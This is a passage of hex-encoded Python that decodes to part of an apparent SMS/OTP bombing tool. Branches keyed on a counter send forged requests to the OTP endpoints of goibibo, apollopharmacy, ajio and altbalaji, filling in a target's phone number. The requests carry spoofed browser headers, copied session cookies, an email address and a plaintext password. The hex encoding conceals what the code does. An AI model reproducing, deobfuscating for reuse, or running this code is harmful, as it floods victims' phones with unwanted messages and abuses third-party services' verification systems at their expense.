x72\x65\x71\x75\x65\x73\x74\x73\x27\x3a\x20\x27\x31\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x27\x6d\x62\x6c\x27\x3a\x20\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x69\x62\x69\x62\x6f\x2e\x63\x6f\x6d\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x73\x6d\x73\x2f\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x32\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x37\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x78\x2d\x72\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x77\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x61\x76\x65\x2d\x64\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x2f\x73\x6f\x63\x69\x61\x6c\x6c\x6f\x67\x69\x6e\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x6c\x6f\x67\x69\x6e\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6f\x6b\x69\x65\x27\x3a\x20\x27\x73\x65\x63\x74\x69\x6f\x6e\x5f\x64\x61\x74\x61\x5f\x69\x64\x73\x3d\x25\x37\x42\x25\x32\x32\x63\x61\x72\x74\x25\x32\x32\x25\x33\x41\x31\x35\x36\x30\x32\x33\x39\x37\x35\x31\x25\x37\x44\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x27\x6d\x6f\x62\x69\x6c\x65\x27\x3a\x20\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x2f\x73\x6f\x63\x69\x61\x6c\x6c\x6f\x67\x69\x6e\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x73\x65\x6e\x64\x6f\x74\x70\x2f\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x73\x65\x6e\x74\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x33\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x39\x37\x39\x39\x32\x38\x33\x31\x39\x2e\x31\x35\x36\x30\x33\x36\x34\x30\x37\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x69\x64\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x36\x36\x36\x32\x37\x30\x32\x31\x36\x2e\x31\x35\x36\x30\x33\x36\x34\x30\x37\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x56\x27\x3a\x20\x27\x32\x30\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x66\x62\x70\x27\x3a\x20\x27\x66\x62\x2e\x31\x2e\x31\x35\x36\x30\x33\x36\x34\x30\x37\x36\x39\x31\x33\x2e\x31\x35\x32\x38\x33\x34\x39\x37\x32\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x74\x6f\x5f\x6c\x77\x69\x64\x27\x3a\x20\x27\x64\x39\x31\x62\x65\x61\x33\x61\x2d\x37\x36\x31\x30\x2d\x34\x35\x61\x61\x2d\x38\x66\x37\x38\x2d\x36\x35\x61\x30\x64\x37\x34\x30\x66\x62\x34\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x50\x75\x73\x68\x53\x75\x62\x73\x63\x72\x69\x62\x65\x72\x53\x74\x61\x74\x75\x73\x27\x3a\x20\x27\x44\x45\x4e\x49\x45\x44\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x70\x65\x63\x6c\x6f\x73\x65\x64\x27\x3a\x20\x27\x74\x72\x75\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x47\x5f\x45\x4e\x41\x42\x4c\x45\x44\x5f\x49\x44\x50\x53\x27\x3a\x20\x27\x67\x6f\x6f\x67\x6c\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x54\x53\x30\x31\x38\x63\x63\x35\x39\x33\x27\x3a\x20\x27\x30\x31\x65\x66\x36\x31\x61\x65\x64\x30\x66\x63\x61\x31\x31\x30\x66\x35\x30\x64\x38\x65\x33\x62\x65\x32\x63\x36\x36\x65\x62\x38\x33\x31\x38\x38\x66\x36\x64\x66\x38\x34\x39\x35\x63\x30\x65\x64\x32\x63\x64\x37\x37\x32\x38\x32\x39\x33\x37\x30\x66\x63\x31\x32\x36\x39\x30\x39\x35\x34\x61\x61\x64\x30\x38\x33\x34\x66\x35\x34\x35\x62\x35\x37\x37\x36\x34\x34\x36\x37\x64\x62\x62\x36\x36\x65\x66\x62\x30\x35\x64\x34\x38\x31\x61\x38\x39\x35\x38\x61\x65\x62\x62\x32\x37\x33\x37\x35\x31\x39\x35\x36\x65\x66\x39\x65\x62\x33\x38\x33\x61\x33\x62\x61\x32\x32\x64\x64\x31\x63\x39\x34\x64\x38\x32\x30\x32\x31\x65\x39\x64\x34\x63\x34\x30\x30\x31\x31\x64\x34\x61\x62\x39\x62\x64\x39\x37\x63\x36\x66\x30\x61\x37\x34\x36\x32\x38\x61\x63\x31\x32\x65\x38\x66\x37\x62\x63\x62\x36\x36\x33\x63\x31\x36\x30\x38\x65\x37\x32\x38\x38\x65\x62\x64\x32\x35\x32\x30\x35\x31\x63\x62\x38\x34\x64\x65\x66\x33\x62\x30\x32\x31\x64\x33\x62\x63\x66\x36\x34\x33\x64\x33\x66\x33\x37\x32\x38\x63\x61\x39\x63\x30\x64\x39\x63\x37\x38\x30\x64\x31\x37\x31\x35\x37\x38\x62\x61\x39\x36\x36\x37\x37\x34\x66\x31\x31\x61\x63\x34\x34\x38\x36\x34\x61\x37\x66\x33\x64\x61\x35\x39\x37\x39\x31\x63\x62\x35\x35\x66\x32\x37\x34\x31\x66\x32\x33\x64\x37\x32\x66\x37\x38\x34\x33\x65\x66\x65\x39\x33\x30\x36\x34\x35\x39\x63\x30\x30\x65\x63\x32\x65\x35\x66\x30\x30\x30\x36\x35\x37\x32\x39\x61\x38\x35\x37\x33\x62\x61\x62\x61\x34\x32\x33\x38\x34\x62\x62\x37\x63\x66\x34\x36\x65\x62\x35\x35\x63\x66\x38\x39\x66\x37\x32\x66\x31\x64\x63\x64\x35\x36\x31\x39\x61\x32\x36\x65\x34\x66\x66\x33\x32\x63\x36\x33\x64\x30\x36\x63\x61\x63\x38\x63\x34\x62\x62\x31\x35\x38\x64\x61\x36\x36\x34\x30\x62\x63\x30\x62\x31\x31\x31\x39\x33\x31\x33\x34\x63\x62\x66\x33\x38\x30\x35\x30\x61\x65\x30\x64\x62\x32\x33\x30\x61\x61\x32\x35\x38\x62\x31\x31\x38\x31\x37\x34\x39\x66\x62\x30\x33\x37\x33\x61\x66\x65\x30\x34\x31\x61\x64\x31\x61\x65\x66\x66\x64\x30\x63\x30\x38\x62\x65\x37\x61\x36\x32\x30\x31\x30\x64\x62\x30\x32\x63\x63\x36\x35\x65\x64\x66\x62\x31\x33\x34\x31\x64\x32\x64\x65\x35\x34\x63\x64\x66\x34\x37\x35\x63\x35\x64\x63\x64\x38\x34\x65\x31\x36\x63\x36\x34\x63\x35\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x61\x63\x5f\x55\x41\x2d\x36\x38\x30\x30\x32\x30\x33\x30\x2d\x31\x27\x3a\x20\x27\x31\x2e\x31\x35\x36\x30\x33\x36\x36\x31\x39\x37\x2e\x43\x6a\x30\x4b\x43\x51\x6a\x77\x78\x59\x4c\x6f\x42\x52\x43\x78\x41\x52\x49\x73\x41\x45\x66\x31\x36\x2d\x74\x78\x35\x55\x58\x72\x72\x50\x39\x53\x45\x68\x52\x38\x64\x50\x6b\x54\x4c\x34\x61\x39\x77\x6f\x45\x46\x37\x41\x65\x2d\x6b\x76\x53\x6c\x7a\x4b\x64\x67\x71\x33\x35\x79\x33\x31\x44\x65\x4b\x33\x5f\x75\x68\x67\x38\x61\x41\x6b\x52\x42\x45\x41\x4c\x77\x5f\x77\x63\x42\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x64\x69\x67\x69\x4d\x72\x6b\x74\x27\x3a\x20\x27\x75\x74\x6d\x5f\x73\x6f\x75\x72\x63\x65\x25\x33\x41\x25\x37\x43\x75\x74\x6d\x5f\x6d\x65\x64\x69\x75\x6d\x25\x33\x41\x25\x37\x43\x64\x65\x76\x69\x63\x65\x25\x33\x41\x6d\x6f\x62\x69\x6c\x65\x25\x37\x43\x65\x78\x70\x69\x72\x65\x73\x25\x33\x41\x46\x72\x69\x25\x32\x43\x25\x32\x30\x31\x32\x25\x32\x30\x4a\x75\x6c\x25\x32\x30\x32\x30\x31\x39\x25\x32\x30\x31\x39\x25\x33\x41\x30\x33\x25\x33\x41\x31\x37\x25\x32\x30\x47\x4d\x54\x25\x37\x43\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x49\x6d\x70\x72\x65\x73\x73\x69\x6f\x6e\x43\x6f\x6f\x6b\x69\x65\x27\x3a\x20\x27\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x69\x70\x27\x3a\x20\x27\x31\x30\x2e\x31\x2e\x31\x30\x2e\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x65\x73\x73\x69\x6f\x6e\x53\x74\x61\x74\x75\x73\x27\x3a\x20\x27\x74\x72\x75\x65\x7c\x75\x6e\x64\x65\x66\x69\x6e\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x46\x69\x72\x73\x74\x50\x61\x67\x65\x27\x3a\x20\x27\x54\x68\x75\x20\x4a\x75\x6e\x20\x31\x33\x20\x32\x30\x31\x39\x20\x30\x30\x3a\x33\x33\x3a\x35\x33\x20\x47\x4d\x54\x2b\x30\x35\x33\x30\x20\x28\x49\x6e\x64\x69\x61\x20\x53\x74\x61\x6e\x64\x61\x72\x64\x20\x54\x69\x6d\x65\x29\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x64\x63\x5f\x67\x74\x6d\x5f\x55\x41\x2d\x36\x38\x30\x30\x32\x30\x33\x30\x2d\x31\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x49\x27\x3a\x20\x27\x6a\x6f\x68\x6e\x79\x61\x68\x6f\x25\x34\x30\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x54\x53\x30\x31\x66\x65\x34\x32\x34\x39\x27\x3a\x20\x27\x30\x31\x65\x66\x36\x31\x61\x65\x64\x30\x39\x63\x33\x32\x63\x36\x61\x35\x33\x63\x65\x39\x65\x34\x33\x31\x61\x36\x61\x37\x31\x39\x63\x34\x31\x36\x38\x36\x37\x66\x32\x66\x33\x61\x64\x37\x31\x33\x66\x64\x65\x32\x65\x37\x34\x31\x37\x35\x62\x63\x32\x34\x38\x61\x63\x63\x37\x61\x35\x32\x33\x66\x34\x31\x65\x39\x37\x35\x31\x64\x30\x33\x32\x38\x35\x39\x61\x31\x35\x39\x62\x66\x66\x66\x38\x37\x36\x36\x34\x62\x39\x30\x63\x33\x64\x30\x61\x39\x64\x66\x62\x32\x33\x39\x32\x66\x37\x35\x38\x37\x36\x63\x63\x62\x65\x32\x37\x33\x62\x38\x61\x38\x65\x38\x31\x64\x37\x61\x38\x64\x32\x35\x30\x34\x37\x34\x35\x33\x63\x31\x37\x61\x32\x39\x30\x35\x65\x63\x61\x37\x65\x66\x66\x32\x36\x62\x37\x38\x30\x63\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x34\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x2f\x73\x69\x67\x6e\x75\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x66\x69\x72\x73\x74\x4e\x61\x6d\x65\x22\x3a\x22\x53\x70\x65\x65\x64\x58\x22\x2c\x22\x6c\x6f\x67\x69\x6e\x22\x3a\x22\x6a\x6f\x68\x6e\x79\x61\x68\x6f\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x22\x2c\x22\x70\x61\x73\x73\x77\x6f\x72\x64\x22\x3a\x22\x52\x6f\x63\x6b\x40\x35\x73\x74\x61\x72\x22\x2c\x22\x67\x65\x6e\x64\x65\x72\x54\x79\x70\x65\x22\x3a\x22\x4d\x61\x6c\x65\x22\x2c\x22\x6d\x6f\x62\x69\x6c\x65\x4e\x75\x6d\x62\x65\x72\x22\x3a\x22\x30\x30\x30\x30\x22\x2c\x22\x72\x65\x71\x75\x65\x73\x74\x54\x79\x70\x65\x22\x3a\x22\x53\x45\x4e\x44\x4f\x54\x50\x22\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x61\x75\x74\x68\x2f\x73\x69\x67\x6e\x75\x70\x53\x65\x6e\x64\x4f\x54\x50\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x5c\x22\x73\x74\x61\x74\x75\x73\x43\x6f\x64\x65\x5c\x22\x3a\x5c\x22\x31\x5c\x22\x22\x29\x20\x21\x3d\x20\x2d\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x34\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x61\x70\x69\x2e\x63\x6c\x6f\x75\x64\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x2c\x20\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6c\x69\x74\x65\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x38\x39\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x3b\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6c\x69\x74\x65\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x2f\x73\x75\x62\x73\x63\x72\x69\x62\x65\x3f\x70\x72\x6f\x67\x72\x65\x73\x73\x3d\x69\x6e\x70\x75\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x22\x3a\x63\x63\x2c\x22\x70\x68\x6f\x6e\x65\x5f\x6e\x75\x6d\x62\x65\x72\x22\x3a\x70\x6e\x7d\x